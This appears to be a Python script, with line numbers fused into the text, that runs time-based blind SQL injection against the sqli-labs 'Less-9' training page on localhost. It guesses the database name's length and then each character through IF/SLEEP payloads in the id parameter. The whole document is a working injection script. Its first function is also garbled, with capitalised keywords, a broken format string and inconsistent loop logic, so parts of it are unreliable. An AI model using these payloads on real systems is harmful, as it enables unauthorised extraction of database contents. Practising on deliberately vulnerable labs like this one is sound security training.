. 1 # Coding: UTF-. 8 2 Import Requests . 3 Import datetime . 4 Import Time . 5 . 6 # obtains the database name length . 7 . 8 . 9 DEF database_len (): 10 for I in Range (. 1, 10 ): . 11 URL = '' ' HTTP: //127.0.0.1/sqli-labs/Less-9/index.php '' ' 12 is payload = ' '' ? = ID. 1 'and IF (length (Database ())> S%, SLEEP (. 1), 0 ) '' ' % I 13 is # Print (URL + payload +'% 23 is') 14 time1 = datetime.datetime.now() 15 r = requests.get(url + payload + '%23') 16 time2 = datetime.datetime.now() 17 sec = (time2 - time1).seconds 18 if sec >= 1: 19 print(i) 20 else: 21 print(i) 22 break 23 print('database_len:', i) 24 25 26 database_len() 27 28 29 #获取数据库名 30 def database_name(): 31 name = '' 32 for j in range(1, 9): 33 for i in '0123456789abcdefghijklmnopqrstuvwxyz': 34 url = '''http://127.0.0.1/sqli-labs/Less-9/index.php''' 35 payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)''' % ( 36 j, i) 37 # print(url+payload+'%23') 38 time1 = datetime.datetime.now() 39 r = requests.get(url + payload + '%23') 40 time2 = datetime.datetime.now() 41 sec = (time2 - time1).seconds 42 if sec >= 1: 43 name += i 44 print(name) 45 break 46 print('database_name:', name) 47 48 49 database_name()